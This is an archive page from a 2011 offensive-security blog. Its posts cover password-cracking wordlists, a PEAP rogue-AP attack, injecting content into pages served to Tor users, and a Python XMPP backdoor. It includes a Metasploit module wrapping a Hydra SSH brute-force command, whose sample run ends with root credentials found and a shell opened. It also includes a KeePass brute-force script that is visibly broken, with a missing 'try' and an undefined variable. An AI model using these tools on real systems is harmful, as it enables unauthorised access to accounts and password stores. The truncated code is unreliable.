Monday, August 29, 2011

Clean a wordlist for use with password cracking tools and rules


This post is just a personal note. I am sure I will need this command in the future to clean up my wordlists :)

$ cat dirtyfile.txt | awk '{gsub(/[[:punct:]]/,"")}1' | tr A-Z a-z | sed 's/[0-9]*//g' | sed -e 's/ //g' | strings | tr -cs '[:alpha:]' '\ ' | sed -e 's/ /\n/g' | tr A-Z a-z | sort -u > cleanfile.txt

Monday, August 22, 2011

Password cracking and creating custom wordlists

In this day and age, almost everybody has a good video card that can be used to crack passwords, like Nvidia and the CUDA framework, and it really helps to speed it up.

Yes, I agree that computing power is really helpful, but it cannot beat a good crafted custom wordlist.  Cracking MD5 hashes may be fast, but try doing the same with other hashes :)

My advise is simple. Know your target as good as you can!!  Their culture, their language, their people, what do they do for living, etc... and build a custom dictionary on top of that.

You may also find useful this old post published by the Pauldotcom crew.  The idea behind it is using the target's website  for our dictionary since, in theory,  it is a valuable source of  the vocabulary being used inside the company.

I did some tests following the above commented tips and I used Cryptohaze Multiforcer  (a CUDA based multihash cracker) to crack the passwords. The results were spectacular and I ended up with a 400MB wordlist (aprox 35M words) and it found many of the passwords  in few minutes :)

Thursday, August 18, 2011

Attacking PEAP wireless networks

Great video, as always, posted by Vivek Ramachandran on SecurityTube.

This time, Vivek explains how to attack PEAP networks.  In a short resume, a Honeypot is setup with a roge AP and a Radius server in order to get the challenge and response  (802.1X) sent when a unaware user connects to our system.

Once we have captured the challenge and the response sent to our own Radius server, we can use the tool called asleap, written by Joshua Wright, that will brute-force the password with a dictionary attack.

WLAN Security Megaprimer 33 from Vivek Ramachandran on Vimeo.

Wednesday, August 10, 2011

Trolling the Tor Script Kiddies

Following a tweet made by insit0r about script kiddies abusing Tor to attack web sites and blocking them ,  I thought we should go a bit further and be evil with them.

My first comment was not to block all the Tor exit nodes, since the attacker will use alternative solutions and we will lose visibility.  In my opinion, it is better to flag the connection as it is breaking our policies than just blocking, because the second case will not give us information about the intention and skills of the attackers, but only a connection rejected.

So, it is better to receive a warning that flags a possible illegal activity and correlate/track  the attacker's movements among our infrastructure.

The above comments explain what it comes to be passive monitoring and information gathering, but we could switch to our grey hat and do something a little bit evil with our attackers :)

What about sending some  countermeasures to our attacker, taking advantage of our position,  given that the attacker is not aware he/she has been discovered?

Following this talk in Spanish presented by  Roberto Martinez, I thought we could use Mod Security to inject content on the pages when we detect someone is connecting through Tor. This gives us the following possibilities:

Note: Searching on Google I found this directory that lists all the Tor exit nodes. Now we have all the tools to troll the script kiddies that want to attack our website.

Friday, August 5, 2011

Brute-forcing SSH accounts with THC Hydra and Metasploit

I have written a simple Auxiliary module for Metasploit that permits to brute-force SSH accounts with THC Hydra and load the sessions in  Metasploit.

The approach is as simple as executing Hydra from the shell and recovering the valid credentials with a regular expression. After this, we only have to open a new session with the  SSH libraries available in the framework.

As a side note, this module cannot be used through pivoting like any external program, but the code can be modified to call hydra with a wrapper like tsocks and then scan trough the Socks4a server module .

%x[tsocks hydra -f -o #{logfile} -w #{timeout} -t #{threads} -s #{rport} -C #{credentials} #{ip}  ssh2]

NOTE: Some of the code is borrowed from the existing SSH auxiliary modules.

Example output:

msf auxiliary(ssh_hydra) > info

       Name: Scanning SSH servers with Hydra
     Module: auxiliary/scanner/ssh/ssh_hydra
    Version: 1
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:

Basic options:
  Name         Current Setting   Required  Description
  ----         ---------------   --------  -----------
  CREDENTIALS  /tmp/credentials  yes       colon separated list of credentials
  RHOSTS       X.X.X.X     yes       The target address range or CIDR identifier
  RPORT        22                yes       The target port
  TASKS        8                 yes       number of connexions in parallel
  TIMEOUT      30                yes       timeout for the responses

  This module will launch THC hydra to brute-force the ssh credentials
  and then open the sessions with the valid ones.

msf auxiliary(ssh_hydra) > run

[*] X.X.X.X:22, SSH server version: SSH-1.99-OpenSSH_4.4
[*] Attacking X.X.X.X
[*] X.X.X.X:22  /tmp/credentials - Calling Hydra

[*] Valid credentials found: X.X.X.X root root
[*] Command shell session 1 opened (Y.Y.Y.Y:35009 -> X.X.X.X:22) at Fri Aug 05 19:06:00 +0200 2011
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The module can be found here: ssh_hydra.rb

Thursday, August 4, 2011

[Spanish] Offensive Security talk by Roberto Martinez

The following video corresponds to a talk presented by Roberto Martinez at the Campus Party in Mexico

I highly recommend watching this video since it explains as security in real life should be, instead  of installing devices and ticking a checkbox :)

I would resume the talk as:

  • Information gathering
  • Intelligence
  • Honeypots
  • Feed all your information in a SIEM system to monitor the network activity.
  • Deception and counter attacks: resource exhaustion, dropping exploits
  • Deanonimation and tracking attackers:  decloaking and using our DNS to track the attacker.

In my opinion, I would also add Darknets or sinkholes to gain more extra intelligence :)

[Spanish] Attacking 2G mobile communications

Via rootedcon. They have published more videos of the last Rooted Con 2011

The following video explains how to perform attacks on 2G mobile networks by making use of OpenBSC.

David Pérez y José Picó - Un ataque práctico contra comunicaciones móviles (Rooted CON 2011) from rootedcon on Vimeo.

Wednesday, August 3, 2011

Brute-forcing Keepass password key-chains

From the website:

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

This open source password manager is available on Window, Mac, Linux, Android and iPhone. Hence, chances are that we will find one of these keychain files during a pen-test.

Looking for ways to brute-force the password I stumbled across with this python implementation that is able to read the file and dump its contents. It should not be very inefficient since it is using pycrypto, that is implemented in C.

The code is fairly simple and expects the list of passwords  in the standard input.  One possibility is to use John the Ripper for this task :)

You can find the code below.

#! /usr/env/python


# reads a list of passwords from the standard input
# john the ripper may be used to feed the application

from keepass import kpdb
import sys
import fileinput

for line in sys.stdin:

                db = kpdb.Database(sys.argv[1],passwd)
                print "Valid password found for %s : %s" % (sys.argv[1],passwd)
        except ValueError:

Tuesday, August 2, 2011

Solftware vendors living in the 90's and the big firewall

This post is yet another my software is behind the firewall rant, you can safely skip it because you wont miss a thing :)

I already twitted about this software vulnerability, but reading the vendor response in the advisory I thought I have to give my two cents.

Basically, their response comes to say that (please note the sarcasm):
Our software is not meant to be in Internet and it should be safe behind the big firewall of your organization. Therefore, we do not care if we have a remote buffer overflow that requires no authentication.

To put it into perspective, the software in question is a licensing server used by many vendors  across the board like: Matlab, Simulink, etc.. and widely deployed in universities and other research institutions, which are their main customers.

So, why do I think their response was not appropriated and, perhaps, idiotic?

  • One of the main characteristics of their costumers is the openness of their networks, because they have students/researchers that tend to go around and need to use the licensing software from all over the network. What does it mean? They have no perimeter and the firewall is useless!
  • Since the license server is inside the network and trusted by the costumer, chances are that the software is running with privileges in a server that is part of the windows domain. What does it mean? The vulnerability can be used by an attacker to gain further access to the domain and perhaps gain domain admin. privileges as a side effect.
  • Their answer is so 90's that they let everybody think that they do not care about security and the lack all the skills.
  • Since they lack on security skills, perhaps they also lack on secure coding practices and there are more security vulnerabilities hidden in their software.

Monday, August 1, 2011

Python XMPP backdoor

Following the previous post, I thought it would be nice to find alternative ways to  code a backdoor  while using Python as the scripting language.

One of my first ideas was to write a simple backdoor that would use some kind of IM (Instant Messaging), like the script kiddies do with IRC. Yes, I can comfortably sit in front of my desk and wait until one of my XMPP bots pops-up in my list of on-line contacts!

I found some easy examples to construct a bot using the python-xmpp library and I reused most of the code.  Pretty script kiddie all together :)

The code can be found here: